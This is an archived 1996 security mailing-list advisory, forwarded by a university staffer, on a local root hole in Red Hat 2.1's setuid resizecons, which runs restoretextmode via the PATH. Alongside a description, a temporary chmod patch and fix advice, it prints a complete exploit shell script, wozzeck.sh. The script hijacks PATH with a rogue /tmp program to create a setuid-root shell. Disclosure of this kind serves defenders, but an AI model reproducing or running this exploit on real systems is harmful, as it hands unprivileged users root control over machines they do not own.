[Prev][Next][Index]

BoS: resizecons Red Hat 2.1 security hole



>
>---------- Forwarded message ----------
>Date: Fri, 2 Feb 1996 22:31:23 -0500 (EST)
>From: David J Meltzer <davem+@andrew.cmu.edu>
>To: best-of-security@suburbia.net, bugtraq@crimelab.com,
>    linux-security@tarsier.cv.nrao.edu, linux-alert@tarsier.cv.nrao.edu
>Subject: BoS: resizecons Red Hat 2.1 security hole
>
>   There is a security hole in Red Hat 2.1, which installs the program
>/usr/bin/resizecons suid root.  The resizecons program allows a user
>to change the videmode of the console.  During this process, it runs
>the program restoretextmode without an absolute pathname, assuming the
>correct version will be found in the path, while running with root
>privileges.  It then executes setfont in the same manner.  By setting
>the path to find a rogue restoretextmode, a user can execute an arbitrary
>program as root.
>   As a more amusing aside, the file /tmp/selection.pid is read and the
>pid contained within is sent a SIGWINCH, allowing a user on the system
>to force a redraw of the screen to an arbitrary process (that handles
>SIGWINCH calls) on the machine.
>   If /usr/bin/resizecons needs to be run by users other than root at the
>console, provisions need to be made in the code to execute the outside
>utilities with absolute pathnames, and to check access rights on files
>before opening.
>
>                   Program: /usr/bin/resizecons
>Affected Operating Systems: Red Hat 2.1 linux distribution
>              Requirements: account on system
>           Temporary Patch: chmod -s /usr/bin/resizecons
>       Security Compromise: root
>                    Author: Dave M. (davem@cmu.edu)
>                  Synopsis: resizecons runs restoretextmode without an
>                            absolute pathname while executing as root,
>                            allowing a user to substitute the real
>                            program with arbitrary commands.
>
>Exploit:
>
>wozzeck.sh:
>#!/bin/sh
>#
># wozzeck.sh
># exploits a security hole in /usr/bin/resizecons
># to create a suid root shell in /tmp/wozz on a
># linux Red Hat 2.1 system.
>#
># by Dave M. (davem@cmu.edu)
>#
>echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
>echo ================ Checking system vulnerability
>if test -u /usr/bin/resizecons
>then
>echo ++++++++++++++++ System appears vulnerable.
>cd /tmp
>cat << _EOF_ > /tmp/313x37
>This exploit is dedicated to
>Wozz.  Use it with care.
>_EOF_
>cat << _EOF_ > /tmp/restoretextmode
>#!/bin/sh
>/bin/cp /bin/sh /tmp/wozz
>/bin/chmod 4777 /tmp/wozz
>_EOF_
>/bin/chmod +x /tmp/restoretextmode
>PATH=/tmp
>echo ================ Executing resizecons
>/usr/bin/resizecons 313x37
>/bin/rm /tmp/restoretextmode
>/bin/rm /tmp/313x37
>if test -u /tmp/wozz
>then
>echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
>else
>echo ---------------- Exploit failed
>fi
>else
>echo ---------------- This machine does not appear to be vulnerable.
>fi
>
>
>
>
>       /-------------\
>       |David Meltzer|
>       |davem@cmu.edu|
> /--------------------------\
> |School of Computer Science|
> |Carnegie Mellon University|
> \--------------------------/
>


                   Ron Cohen, Tel-Aviv University Computation Center
                   Office 03-6407043, Home 09-663590
                   E-mail: rony@post.tau.ac.il
                   Fax: (972) 03-6409118